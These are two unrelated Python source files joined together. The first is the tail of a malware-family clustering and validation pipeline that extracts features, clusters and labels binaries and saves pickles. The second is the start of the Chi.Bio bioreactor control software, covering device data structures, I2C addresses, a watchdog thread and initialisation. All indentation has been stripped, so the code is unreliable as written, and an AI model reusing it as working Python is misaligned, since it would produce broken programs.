print("Processing incoming file number: " + str(incoming_files_parsed))
# If file was successfully retrieved from queue
if fileinfo['sha256'] in files.keys():
# If file has been received and clustered before
# Merge new data into the existing data.
if PRINT_PROGRESS:
print("Merging file with existing information " + fileinfo['sha256'])
current_file = files[fileinfo['sha256']]
if fileinfo['incoming']:
current_file['incoming'] = True
else: # If file is not incoming (was unpacked from another file)
# Update "unpacks_from" since it might be contained in multiple different binaries
current_file['unpacks_from'].update(fileinfo['unpacks_from'])
else:
# If file has not been received before, add data
if PRINT_PROGRESS:
print("Storing file " + fileinfo['sha256'])
# Add file information to global data structure
files[fileinfo['sha256']] = fileinfo
# Attempt to retrieve next file and continue loop
fileinfo = get_fileinfo_from_done_queue(done_queue)
def cluster_and_validate_incoming(files, clusters):
"""
Cluster and perform validation on files that are in the
feature extraction job done queue.
"""
done_queue = get_done_queue()
incoming_files_parsed = 0
correctly_labelled = 0
incorrectly_labelled = 0
not_labelled = 0
labelled_packed = 0
not_labelled_packed = 0
fast_clustered = 0
fast_clustered_incoming = 0
slow_clustered = 0
slow_clustered_incoming = 0
# Attempt to retrieve a file from the done queue
fileinfo = get_fileinfo_from_done_queue(done_queue)
# Continue while it is possible to retrieve a file
while fileinfo is not None:
if fileinfo['incoming']:
incoming_files_parsed += 1
if PRINT_PROGRESS:
print("Clustering incoming file number: " + str(incoming_files_parsed))
# If file was successfully retrieved from queue
if fileinfo['sha256'] in files.keys():
# If file has been received and clustered before
# Merge new data into the existing data.
if PRINT_PROGRESS:
print("Merging file with existing information " + fileinfo['sha256'])
current_file = files[fileinfo['sha256']]
if fileinfo['incoming']:
current_file['incoming'] = True
else: # If file is not incoming (was unpacked from another file)
# Update "unpacks_from" since it might be contained in multiple different binaries
current_file['unpacks_from'].update(fileinfo['unpacks_from'])
else:
# If file has not been received before, add data
if PRINT_PROGRESS:
print("Storing file " + fileinfo['sha256'])
# Add file to global data structure
files[fileinfo['sha256']] = fileinfo
# Cluster the file
if clustering.cluster_file(fileinfo, files, clusters):
fast_clustered += 1
if fileinfo['incoming']:
fast_clustered_incoming += 1
else:
slow_clustered += 1
if fileinfo['incoming']:
slow_clustered_incoming += 1
# Label the file
clustering.label_file(fileinfo, files, clusters)
if fileinfo['incoming']:
# Check if correctly labelled and store results
if fileinfo['given_label'] is not None:
if fileinfo['family'] == fileinfo['given_label']:
correctly_labelled += 1
else:
incorrectly_labelled += 1
if fileinfo['obfuscation']:
labelled_packed += 1
else:
not_labelled += 1
if fileinfo['obfuscation'] is not None:
not_labelled_packed += 1
# Attempt to retrieve next file and continue loop
fileinfo = get_fileinfo_from_done_queue(done_queue)
# Return statistics:
return {
'correctly_labelled': correctly_labelled,
'incorrectly_labelled': incorrectly_labelled,
'not_labelled': not_labelled,
'not_labelled_packed': not_labelled_packed,
'labelled_packed': labelled_packed,
'incoming_files_parsed': incoming_files_parsed,
'fast_clustered': fast_clustered,
'fast_clustered_incoming': fast_clustered_incoming,
'slow_clustered': slow_clustered,
'slow_clustered_incoming': slow_clustered_incoming
}
def save_to_pickles(folder):
"""
Save data to pickles to allow later processing.
Folder should be the path to a folder where the
files "files.pkl" and "clusters.pkl" will be stored.
Suggested values for folder:
pickles/extracted/
pickles/clustered/
pickles/validated/
"""
global files
global clusters
if not os.path.exists(folder):
os.makedirs(folder)
files_path = os.path.join(folder, 'files.pkl')
clusters_path = os.path.join(folder, 'clusters.pkl')
with open(files_path, 'wb') as picklefile:
pickle.dump(files, picklefile)
with open(clusters_path, 'wb') as picklefile:
pickle.dump(clusters, picklefile)
def load_from_pickles(folder, load_clusters=False):
"""
Load data from pickles
Folder should be the path to a folder where the
files "files.pkl" and "clusters.pkl" will be stored.
Suggested values:
pickles/extracted/
pickles/clustered/
pickles/validated/
If load_clusters is True, clusters will also be loaded
Returns False on failure to load pickles and True on success
"""
global files
global clusters
files_path = os.path.join(folder, 'files.pkl')
clusters_path = os.path.join(folder, 'clusters.pkl')
if not os.path.exists(files_path):
print("Files pickle not found. Perform feature extraction before attempting to cluster / validate.")
return False
else:
with open(files_path, 'rb') as picklefile:
files = pickle.load(picklefile)
if load_clusters and not os.path.exists(clusters_path):
print("Clusters pickle not found. Perform training before attempting to validate.")
return False
elif load_clusters:
with open(clusters_path, 'rb') as picklefile:
clusters = pickle.load(picklefile)
return True
# If main script (not another thread/process)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run feature extraction/clustering')
parser.add_argument('-N', '--number-of-workers', type=int, default=multiprocessing.cpu_count(), help='Integer specifying the number of feature extraction threads')
parser.add_argument('-E', '--extraction-list', help='Path to a text file containing filepaths to files that should have their features extracted (for clustering), where each line consists of <path> <family>. Path must not contain any spaces.')
parser.add_argument('-C', '--cluster', action='store_true', help='Do clustering on files where features have been extracted.')
parser.add_argument('-T', '--train-list', help='Equivalent of -E <filename> -C. Path to a text file containing filepaths to files in training set, where each line consists of <path> <family>. Path must not contain any spaces.')
parser.add_argument('-V', '--validation-list', help='Path to a text file containing filepaths to files in validation (testing) set, where each line consists of <path> <family>. Path must not contain any spaces.')
args = parser.parse_args()
# Fill list with files that should be sent to analysis
files_for_analysis = []
filename = None
mark_as_training = False
do_extraction = False
do_clustering = args.cluster
do_validation = False
if args.train_list is not None:
filename = args.train_list
mark_as_training = True
do_extraction = True
do_clustering = True
if args.extraction_list is not None:
filename = args.extraction_list
mark_as_training = True
do_extraction = True
if args.validation_list is not None:
filename = args.validation_list
do_validation = True
if do_extraction or do_validation:
# Load paths and families from file and process the files
with open(filename, 'r') as infile:
lines = infile.read().splitlines()
for line in lines:
path, fam = line.split(' ')
files_for_analysis.append({'path': path, 'family': fam})
number_of_files = len(files_for_analysis)
if not number_of_files:
print("No files to analyse")
raise SystemExit
# If filepaths have been loaded
# Create queue daemon for files to perform feature extraction on
multiprocessing.Process(target=serve_simple_queue, args=(QUEUE_MANAGER_IP, JOB_MANAGER_PORT, QUEUE_MANAGER_KEY), daemon=True).start()
# Create queue daemon for files to perform clustering on
multiprocessing.Process(target=serve_simple_queue, args=(QUEUE_MANAGER_IP, DONE_MANAGER_PORT, QUEUE_MANAGER_KEY), daemon=True).start()
# Sleep for 0.2 second to ensure queues are running
time.sleep(0.2)
multiprocessing.Process(target=add_files_for_extraction, args=(files_for_analysis), daemon=True).start()
# Create a thread that retrieves files from feature extraction queue,
# extracts their features and adds them to the clustering queue.
for i in range(args.number_of_workers):
multiprocessing.Process(target=feature_extraction_worker, args=(mark_as_training,), daemon=True).start()
if do_extraction:
# Store files coming from feature extraction job done queue.
collect_features(files)
# Save file features to pickles
save_to_pickles('pickles/extracted/')
if do_clustering:
# Load file features from pickles
if do_extraction or load_from_pickles('pickles/extracted/'):
# Cluster the files based on extracted features
clustering.cluster_files(files, clusters)
# Label the created clusters
clustering.label_clusters(files, clusters)
clustering_statistics = clustering.analyse_clustered_files(files)
clustering_statistics.update(clustering.analyse_clusters(files, clusters))
for key, val in clustering_statistics.items():
print(str(key) + ": " + str(val))
# Save updated file information and clusters to pickles.
save_to_pickles('pickles/clustered/')
if do_validation:
# Load files and clusters from training
if load_from_pickles('pickles/clustered/', True):
# Perform feature extraction, cluster and label
# files coming from feature extraction job done queue.
validation_statistics = cluster_and_validate_incoming(files, clusters)
# Calculate number of files not parsed
validation_statistics['non_parsed_files'] = number_of_files - validation_statistics['incoming_files_parsed']
# Collect statistics on clusters after validation
validation_statistics.update(clustering.analyse_clustered_files(files))
validation_statistics.update(clustering.analyse_clusters(files, clusters))
# Print statistics when done:
for key, val in validation_statistics.items():
print(str(key) + ": " + str(val))
# Save updated file information and clusters to pickles
save_to_pickles('pickles/validated/')
|
app_original.py
|
######### Chi.Bio Operating System V1.0 #########
#Import required python packages
import os
import random
import time
import math
from flask import Flask, render_template, jsonify
from threading import Thread, Lock
import threading
import numpy as np
from datetime import datetime, date
import Adafruit_GPIO.I2C as I2C
import Adafruit_BBIO.GPIO as GPIO
import time
import serial
import simplejson
import copy
import csv
import smbus2 as smbus
application = Flask(__name__)
application.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 #Try this https://stackoverflow.com/questions/23112316/using-flask-how-do-i-modify-the-cache-control-header-for-all-output/23115561#23115561
lock=Lock()
#Initialise data structures.
#Sysdata is a structure created for each device and contains the setup / measured data related to that device during an experiment. All of this information is passed into the user interface during an experiment.
sysData = {'M0' : {
'UIDevice' : 'M0',
'present' : 0,
'presentDevices' : { 'M0' : 0,'M1' : 0,'M2' : 0,'M3' : 0,'M4' : 0,'M5' : 0,'M6' : 0,'M7' : 0},
'Version' : {'value' : 'Turbidostat V3.0'},
'DeviceID' : '',
'time' : {'record' : []},
'LEDA' : {'WL' : '395', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDB' : {'WL' : '457', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDC' : {'WL' : '500', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDD' : {'WL' : '523', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDE' : {'WL' : '595', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDF' : {'WL' : '623', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LEDG' : {'WL' : '6500K', 'default': 0.1, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'LASER650' : {'name' : 'LASER650', 'default': 0.5, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'UV' : {'WL' : 'UV', 'default': 0.5, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0},
'Heat' : {'default': 0.0, 'target' : 0.0, 'max': 1.0, 'min' : 0.0,'ON' : 0,'record' : []},
'Thermostat' : {'default': 37.0, 'target' : 0.0, 'max': 50.0, 'min' : 0.0,'ON' : 0,'record' : [],'cycleTime' : 30.0, 'Integral' : 0.0,'last' : -1},
'Experiment' : {'indicator' : 'USR0', 'startTime' : 'Waiting', 'startTimeRaw' : 0, 'ON' : 0,'cycles' : 0, 'cycleTime' : 60.0,'threadCount' : 0},
'Terminal' : {'text' : ''},
'AS7341' : {
'spectrum' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0, 'NIR' : 0,'DARK' : 0,'ExtGPIO' : 0, 'ExtINT' : 0, 'FLICKER' : 0},
'channels' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0, 'NIR' : 0,'DARK' : 0,'ExtGPIO' : 0, 'ExtINT' : 0, 'FLICKER' : 0},
'current' : {'ADC0': 0,'ADC1': 0,'ADC2': 0,'ADC3': 0,'ADC4': 0,'ADC5' : 0}},
'ThermometerInternal' : {'current' : 0.0,'record' : []},
'ThermometerExternal' : {'current' : 0.0,'record' : []},
'ThermometerIR' : {'current' : 0.0,'record' : []},
'OD' : {'current' : 0.0,'target' : 0.5,'default' : 0.5,'max': 10, 'min' : 0,'record' : [],'targetrecord' : [],'Measuring' : 0, 'ON' : 0,'Integral' : 0.0,'Integral2' : 0.0,'device' : 'LASER650'},
'OD0' : {'target' : 0.0,'raw' : 0.0,'max' : 100000.0,'min': 0.0,'LASERb' : 1.833 ,'LASERa' : 0.226, 'LEDFa' : 0.673, 'LEDAa' : 7.0 },
'Chemostat' : {'ON' : 0, 'p1' : 0.0, 'p2' : 0.1},
'Zigzag': {'ON' : 0, 'Zig' : 0.04,'target' : 0.0,'SwitchPoint' : 0},
'GrowthRate': {'current' : 0.0,'record' : [],'default' : 2.0},
'Volume' : {'target' : 20.0,'max' : 50.0, 'min' : 0.0,'ON' : 0},
'Pump1' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Pump2' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Pump3' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Pump4' : {'target' : 0.0,'default' : 0.0,'max': 1.0, 'min' : -1.0, 'direction' : 1.0, 'ON' : 0,'record' : [], 'thread' : 0},
'Stir' : {'target' : 0.0,'default' : 0.5,'max': 1.0, 'min' : 0.0, 'ON' : 0},
'Light' : {'target' : 0.0,'default' : 0.5,'max': 1.0, 'min' : 0.0, 'ON' : 0, 'Excite' : 'LEDD', 'record' : []},
'Custom' : {'Status' : 0.0,'default' : 0.0,'Program': 'C1', 'ON' : 0,'param1' : 0, 'param2' : 0, 'param3' : 0.0, 'record' : []},
'FP1' : {'ON' : 0 ,'LED' : 0,'BaseBand' : 0, 'Emit11Band' : 0,'Emit2Band' : 0,'Base' : 0, 'Emit11' : 0,'Emit2' : 0,'BaseRecord' : 0, 'Emit1Record' : 0,'Emit2Record' : 0 ,'Gain' : 0},
'FP2' : {'ON' : 0 ,'LED' : 0,'BaseBand' : 0, 'Emit11Band' : 0,'Emit2Band' : 0,'Base' : 0, 'Emit11' : 0,'Emit2' : 0,'BaseRecord' : 0, 'Emit1Record' : 0,'Emit2Record' : 0 ,'Gain' : 0},
'FP3' : {'ON' : 0 ,'LED' : 0,'BaseBand' : 0, 'Emit11Band' : 0,'Emit2Band' : 0,'Base' : 0, 'Emit11' : 0,'Emit2' : 0,'BaseRecord' : 0, 'Emit1Record' : 0,'Emit2Record' : 0 ,'Gain' : 0},
'biofilm' : {'LEDA' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDB' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDC' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDD' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDE' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDF' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LEDG' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0},
'LASER650' : {'nm410' : 0, 'nm440' : 0, 'nm470' : 0, 'nm510' : 0, 'nm550' : 0, 'nm583' : 0, 'nm620' : 0, 'nm670' : 0,'CLEAR' : 0,'NIR' : 0}}
}}
#SysDevices is unique to each device and is responsible for storing information required for the digital communications, and various automation funtions. These values are stored outside sysData since they are not passable into the HTML interface using the jsonify package.
sysDevices = {'M0' : {
'AS7341' : {'device' : 0},
'ThermometerInternal' : {'device' : 0},
'ThermometerExternal' : {'device' : 0},
'ThermometerIR' : {'device' : 0,'address' :0},
'DAC' : {'device' : 0},
'Pumps' : {'device' : 0,'startup' : 0, 'frequency' : 0},
'PWM' : {'device' : 0,'startup' : 0, 'frequency' : 0},
'Pump1' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Pump2' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Pump3' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Pump4' : {'thread' : 0,'threadCount' : 0, 'active' : 0},
'Experiment' : {'thread' : 0},
'Thermostat' : {'thread' : 0,'threadCount' : 0},
}}
for M in ['M1','M2','M3','M4','M5','M6','M7']:
sysData[M]=copy.deepcopy(sysData['M0'])
sysDevices[M]=copy.deepcopy(sysDevices['M0'])
#sysItems stores information about digital addresses which is used as a reference for all devices.
sysItems = {
'DAC' : {'LEDA' : '00000100','LEDB' : '00000000','LEDC' : '00000110','LEDD' : '00000001','LEDE' : '00000101','LEDF' : '00000011','LEDG' : '00000010','LASER650' : '00000111'},
'Multiplexer' : {'device' : 0 , 'M0' : '00000001','M1' : '00000010','M2' : '00000100','M3' : '00001000','M4' : '00010000','M5' : '00100000','M6' : '01000000','M7' : '10000000'},
'UIDevice' : 'M0',
'Watchdog' : {'pin' : 'P8_11','thread' : 0,'ON' : 1},
'FailCount' : 0,
'All' : {'ONL' : 0xFA, 'ONH' : 0xFB, 'OFFL' : 0xFC, 'OFFH' : 0xFD},
'Stir' : {'ONL' : 0x06, 'ONH' : 0x07, 'OFFL' : 0x08, 'OFFH' : 0x09},
'Heat' : {'ONL' : 0x3E, 'ONH' : 0x3F, 'OFFL' : 0x40, 'OFFH' : 0x41},
'UV' : {'ONL' : 0x42, 'ONH' : 0x43, 'OFFL' : 0x44, 'OFFH' : 0x45},
'LEDA' : {'ONL' : 0x0E, 'ONH' : 0x0F, 'OFFL' : 0x10, 'OFFH' : 0x11},
'LEDB' : {'ONL' : 0x16, 'ONH' : 0x17, 'OFFL' : 0x18, 'OFFH' : 0x19},
'LEDC' : {'ONL' : 0x0A, 'ONH' : 0x0B, 'OFFL' : 0x0C, 'OFFH' : 0x0D},
'LEDD' : {'ONL' : 0x1A, 'ONH' : 0x1B, 'OFFL' : 0x1C, 'OFFH' : 0x1D},
'LEDE' : {'ONL' : 0x22, 'ONH' : 0x23, 'OFFL' : 0x24, 'OFFH' : 0x25},
'LEDF' : {'ONL' : 0x1E, 'ONH' : 0x1F, 'OFFL' : 0x20, 'OFFH' : 0x21},
'LEDG' : {'ONL' : 0x12, 'ONH' : 0x13, 'OFFL' : 0x14, 'OFFH' : 0x15},
'Pump1' : {
'In1' : {'ONL' : 0x06, 'ONH' : 0x07, 'OFFL' : 0x08, 'OFFH' : 0x09},
'In2' : {'ONL' : 0x0A, 'ONH' : 0x0B, 'OFFL' : 0x0C, 'OFFH' : 0x0D},
},
'Pump2' : {
'In1' : {'ONL' : 0x0E, 'ONH' : 0x0F, 'OFFL' : 0x10, 'OFFH' : 0x11},
'In2' : {'ONL' : 0x12, 'ONH' : 0x13, 'OFFL' : 0x14, 'OFFH' : 0x15},
},
'Pump3' : {
'In1' : {'ONL' : 0x16, 'ONH' : 0x17, 'OFFL' : 0x18, 'OFFH' : 0x19},
'In2' : {'ONL' : 0x1A, 'ONH' : 0x1B, 'OFFL' : 0x1C, 'OFFH' : 0x1D},
},
'Pump4' : {
'In1' : {'ONL' : 0x1E, 'ONH' : 0x1F, 'OFFL' : 0x20, 'OFFH' : 0x21},
'In2' : {'ONL' : 0x22, 'ONH' : 0x23, 'OFFL' : 0x24, 'OFFH' : 0x25},
},
'AS7341' : {
'0x00' : {'A' : 'nm470', 'B' : 'U'},
'0x01' : {'A' : 'U', 'B' : 'nm410'},
'0x02' : {'A' : 'U', 'B' : 'U'},
'0x03' : {'A' : 'nm670', 'B' : 'U'},
'0x04' : {'A' : 'U', 'B' : 'nm583'},
'0x05' : {'A' : 'nm510', 'B' : 'nm440'},
'0x06' : {'A' : 'nm550', 'B' : 'U'},
'0x07' : {'A' : 'U', 'B' : 'nm620'},
'0x08' : {'A' : 'CLEAR', 'B' : 'U'},
'0x09' : {'A' : 'nm550', 'B' : 'U'},
'0x0A' : {'A' : 'U', 'B' : 'nm620'},
'0x0B' : {'A' : 'U', 'B' : 'U'},
'0x0C' : {'A' : 'nm440', 'B' : 'U'},
'0x0D' : {'A' : 'U', 'B' : 'nm510'},
'0x0E' : {'A' : 'nm583', 'B' : 'nm670'},
'0x0F' : {'A' : 'nm470', 'B' : 'U'},
'0x10' : {'A' : 'ExtGPIO', 'B' : 'nm410'},
'0x11' : {'A' : 'CLEAR', 'B' : 'ExtINT'},
'0x12' : {'A' : 'DARK', 'B' : 'U'},
'0x13' : {'A' : 'FLICKER', 'B' : 'NIR'},
}
}
# This section of code is responsible for the watchdog circuit. The circuit is implemented in hardware on the control computer, and requires the watchdog pin be toggled low->high each second, otherwise it will power down all connected devices. This section is therefore critical to operation of the device.
def runWatchdog():
#Watchdog timing function which continually runs in a thread.
global sysItems;
if (sysItems['Watchdog']['ON']==1):
#sysItems['Watchdog']['thread']
toggleWatchdog();
time.sleep(0.15)
sysItems['Watchdog']['thread']=Thread(target = runWatchdog, args=())
sysItems['Watchdog']['thread'].setDaemon(True)
sysItems['Watchdog']['thread'].start();
def toggleWatchdog():
#Toggle the watchdog
global sysItems;
GPIO.output(sysItems['Watchdog']['pin'], GPIO.HIGH)
time.sleep(0.05)
GPIO.output(sysItems['Watchdog']['pin'], GPIO.LOW)
GPIO.setup(sysItems['Watchdog']['pin'], GPIO.OUT)
print(str(datetime.now()) + ' Starting watchdog')
sysItems['Watchdog']['thread']=Thread(target = runWatchdog, args=())
sysItems['Watchdog']['thread'].setDaemon(True)
sysItems['Watchdog']['thread'].start();
GPIO.setup('P8_15', GPIO.OUT) #This output connects to the RESET pin on the I2C Multiplexer.
GPIO.output('P8_15', GPIO.HIGH)
GPIO.setup('P8_17', GPIO.OUT) #This output connects to D input of the D-Latch
GPIO.output('P8_17', GPIO.HIGH)
def initialise(M):
#Function that initialises all parameters / clears stored values for a given device.
#If you want to record/add values to sysData, recommend adding an initialisation line in here.
global sysData;
global sysItems;
global sysDevices
for LED in ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG']:
sysData[M][LED]['target']=sysData[M][LED]['default']
sysData[M][LED]['ON']=0
sysData[M]['UV']['target']=sysData[M]['UV']['default']
sysData[M]['UV']['ON']=0
sysData[M]['LASER650']['target']=sysData[M]['LASER650']['default']
sysData[M]['LASER650']['ON']=0
FP='FP1'
sysData[M][FP]['ON']=0
sysData[M][FP]['LED']="LEDB"
sysData[M][FP]['Base']=0
sysData[M][FP]['Emit1']=0
sysData[M][FP]['Emit2']=0
sysData[M][FP]['BaseBand']="CLEAR"
sysData[M][FP]['Emit1Band']="nm510"
sysData[M][FP]['Emit2Band']="nm550"
sysData[M][FP]['Gain']="x10"
sysData[M][FP]['BaseRecord']=[]
sysData[M][FP]['Emit1Record']=[]
sysData[M][FP]['Emit2Record']=[]
FP='FP2'
sysData[M][FP]['ON']=0
sysData[M][FP]['LED']="LEDD"
sysData[M][FP]['Base']=0
sysData[M][FP]['Emit1']=0
sysData[M][FP]['Emit2']=0
sysData[M][FP]['BaseBand']="CLEAR"
sysData[M][FP]['Emit1Band']="nm583"
sysData[M][FP]['Emit2Band']="nm620"
sysData[M][FP]['BaseRecord']=[]
sysData[M][FP]['Emit1Record']=[]
sysData[M][FP]['Emit2Record']=[]
sysData[M][FP]['Gain']="x10"
FP='FP3'
sysData[M][FP]['ON']=0
sysData[M][FP]['LED']="LEDE"
sysData[M][FP]['Base']=0
sysData[M][FP]['Emit1']=0
sysData[M][FP]['Emit2']=0
sysData[M][FP]['BaseBand']="CLEAR"
sysData[M][FP]['Emit1Band']="nm620"
sysData[M][FP]['Emit2Band']="nm670"
sysData[M][FP]['BaseRecord']=[]
sysData[M][FP]['Emit1Record']=[]
sysData[M][FP]['Emit2Record']=[]
sysData[M][FP]['Gain']="x10"
for PUMP in ['Pump1','Pump2','Pump3','Pump4']:
sysData[M][PUMP]['default']=0.0;
sysData[M][PUMP]['target']=sysData[M][PUMP]['default']
sysData[M][PUMP]['ON']=0
sysData[M][PUMP]['direction']=1.0
sysDevices[M][PUMP]['threadCount']=0
sysDevices[M][PUMP]['active']=0
sysData[M]['Heat']['default']=0;
sysData[M]['Heat']['target']=sysData[M]['Heat']['default']
sysData[M]['Heat']['ON']=0
sysData[M]['Thermostat']['default']=37.0;
sysData[M]['Thermostat']['target']=sysData[M]['Thermostat']['default']
sysData[M]['Thermostat']['ON']=0
sysData[M]['Thermostat']['Integral']=0
sysData[M]['Thermostat']['last']=-1
sysData[M]['Stir']['target']=sysData[M]['Stir']['default']
sysData[M]['Stir']['ON']=0
sysData[M]['Light']['target']=sysData[M]['Light']['default']
sysData[M]['Light']['ON']=0
sysData[M]['Light']['Excite']='LEDD'
sysData[M]['Custom']['Status']=sysData[M]['Custom']['default']
sysData[M]['Custom']['ON']=0
sysData[M]['Custom']['Program']='C1'
sysData[M]['Custom']['param1']=0.0
sysData[M]['Custom']['param2']=0.0
sysData[M]['Custom']['param3']=0.0
sysData[M]['OD']['current']=0.0
sysData[M]['OD']['target']=sysData[M]['OD']['default'];
sysData[M]['OD0']['target']=65000.0
sysData[M]['OD0']['raw']=65000.0
sysData[M]['OD']['device']='LASER650'
#sysData[M]['OD']['device']='LEDA'
#if (M=='M0'):
# sysData[M]['OD']['device']='LEDA'
sysData[M]['Volume']['target']=20.0
clearTerminal(M)
addTerminal(M,'System Initialised')
sysData[M]['Experiment']['ON']=0
sysData[M]['Experiment']['cycles']=0
sysData[M]['Experiment']['threadCount']=0
sysData[M]['Experiment']['startTime']=' Waiting '
sysData[M]['Experiment']['startTimeRaw']=0
sysData[M]['OD']['ON']=0
sysData[M]['OD']['Measuring']=0
sysData[M]['OD']['Integral']=0.0
sysData[M]['OD']['Integral2']=0.0
sysData[M]['Zigzag']['ON']=0
sysData[M]['Zigzag']['target']=0.0
sysData[M]['Zigzag']['SwitchPoint']=0
sysData[M]['GrowthRate']['current']=sysData[M]['GrowthRate']['default']
sysDevices[M]['Thermostat']['threadCount']=0
channels=['nm410','nm440','nm470','nm510','nm550','nm583','nm620', 'nm670','CLEAR','NIR','DARK','ExtGPIO', 'ExtINT' , 'FLICKER']
for channel in channels:
sysData[M]['AS7341']['channels'][channel]=0
sysData[M]['AS7341']['spectrum'][channel]=0
DACS=['ADC0', 'ADC1', 'ADC2', 'ADC3', 'ADC4', 'ADC5']
for DAC in DACS:
sysData[M]['AS7341']['current'][DAC]=0
sysData[M]['ThermometerInternal']['current']=0.0
sysData[M]['ThermometerExternal']['current']=0.0
sysData[M]['ThermometerIR']['current']=0.0
sysData[M]['time']['record']=[]
sysData[M]['OD']['record']=[]
sysData[M]['OD']['targetrecord']=[]
sysData[M]['Pump1']['record']=[]
sysData[M]['Pump2']['record']=[]
sysData[M]['Pump3']['record']=[]
sysData[M]['Pump4']['record']=[]
sysData[M]['Heat']['record']=[]
sysData[M]['Light']['record']=[]
sysData[M]['ThermometerInternal']['record']=[]
sysData[M]['ThermometerExternal']['record']=[]
sysData[M]['ThermometerIR']['record']=[]
sysData[M]['Thermostat']['record']=[]
sysData[M]['GrowthRate']['record']=[]
sysDevices[M]['ThermometerInternal']['device']=I2C.get_i2c_device(0x18,2) #Get Thermometer on Bus 2!!!
sysDevices[M]['ThermometerExternal']['device']=I2C.get_i2c_device(0x1b,2) #Get Thermometer on Bus 2!!!
sysDevices[M]['DAC']['device']=I2C.get_i2c_device(0x48,2) #Get DAC on Bus 2!!!
sysDevices[M]['AS7341']['device']=I2C.get_i2c_device(0x39,2) #Get OD Chip on Bus 2!!!!!
sysDevices[M]['Pumps']['device']=I2C.get_i2c_device(0x61,2) #Get OD Chip on Bus 2!!!!!
sysDevices[M]['Pumps']['startup']=0
sysDevices[M]['Pumps']['frequency']=0x1e #200Hz PWM frequency
sysDevices[M]['PWM']['device']=I2C.get_i2c_device(0x60,2) #Get OD Chip on Bus 2!!!!!
sysDevices[M]['PWM']['startup']=0
sysDevices[M]['PWM']['frequency']=0x03# 0x14 = 300hz, 0x03 is 1526 Hz PWM frequency for fan/LEDs, maximum possible. Potentially dial this down if you are getting audible ringing in the device!
#There is a tradeoff between large frequencies which can make capacitors in the 6V power regulation oscillate audibly, and small frequencies which result in the number of LED "ON" cycles varying during measurements.
sysDevices[M]['ThermometerIR']['device']=smbus.SMBus(bus=2) #Set up SMBus thermometer
sysDevices[M]['ThermometerIR']['address']=0x5a
# This section of commented code is used for testing I2C communication integrity.
# sysData[M]['present']=1
# getData=I2CCom(M,'ThermometerInternal',1,16,0x05,0,0)
# i=0
# while (1==1):
# i=i+1
# if (i%1000==1):
# print(str(i))
# sysDevices[M]['ThermometerInternal']['device'].readU8(int(0x05))
# getData=I2CCom(M,which,1,16,0x05,0,0)
scanDevices(M)
if(sysData[M]['present']==1):
turnEverythingOff(M)
print(str(datetime.now()) + " Initialised " + str(M) +', Device ID: ' + sysData[M]['DeviceID'])
def initialiseAll():
# Initialisation function which runs at when software is started for the first time.
sysItems['Multiplexer']['device']=I2C.get_i2c_device(0x74,2)
sysItems['FailCount']=0
time.sleep(2.0) #This wait is to allow the watchdog circuit to boot.
print(str(datetime.now()) + ' Initialising devices')
for M in ['M0','M1','M2','M3','M4','M5','M6','M7']:
initialise(M)
scanDevices("all")
def turnEverythingOff(M):
# Function which turns off all actuation/hardware.
for LED in ['LEDA','LEDB','LEDC','LEDD','LEDE','LEDF','LEDG']:
sysData[M][LED]['ON']=0
sysData[M]['LASER650']['ON']=0
sysData[M]['Pump1']['ON']=0
sysData[M]['Pump2']['ON']=0
sysData[M]['Pump3']['ON']=0
sysData[M]['Pump4']['ON']=0
sysData[M]['Stir']['ON']=0
